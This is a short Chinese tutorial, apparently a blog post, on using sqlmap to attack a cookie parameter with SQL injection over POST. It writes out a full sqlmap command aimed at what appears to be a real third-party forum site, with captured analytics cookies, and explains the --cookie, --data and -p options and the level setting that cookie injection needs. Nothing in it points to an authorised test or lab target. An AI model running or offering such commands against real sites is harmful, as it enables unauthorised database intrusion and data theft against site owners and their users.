sqlmap使用post方法对cookie进行注入

    sqlmap默认使用get方法,并且只有在注入level>=2的时候才会对cookie进行注入,要想使用post方法,但是如果post的参数为0,可以指定 --data 为空,下面以cookie名为CNZZDATA3834609为例进行注入:

 sqlmap -u http://www.beihai.ccoo.cn/forum/GetUserInfo.Asp?id=0  --cookie="CNZZDATA3568186=cnzz_eid%3D1227930120-1395711655-%26ntime%3D1395799625%26cnzz_a%3D1%26sin%3Dnone%26ltime%3D1395799604656%26rtime%3D1; CNZZDATA3834609=cnzz_eid%3D144071239-1395711655-%26ntime%3D1395799624%26cnzz_a" -p ”CNZZDATA3834609“ --data ""  --level 2


    下面再分别说明几个选项的作用:

   --cookie="CNZZDATA3568186=cnzz_eid%3D1227930120-1395711655-%26ntime%3D1395799625%26cnzz_a%3D1%26sin%3Dnone%26ltime%3D1395799604656%26rtime%3D1; CNZZDATA3834609=cnzz_eid%3D144071239-1395711655-%26ntime%3D1395799624%26cnzz_a"        当需要对cookie注入的时候,必须使用--cookie选项


   --data ""              因为post的数据长度为0,但是又想使用post方法进行注入,则使用--data ""     ,使用--data选项后,sqlmap自动使用post方法,sqlmap不支持使用--method指定http请求方法


    -p ”CNZZDATA3834609“    指定对名为”CNZZDATA3834609的cookie进行注入


   

你可能感兴趣的:(web安全)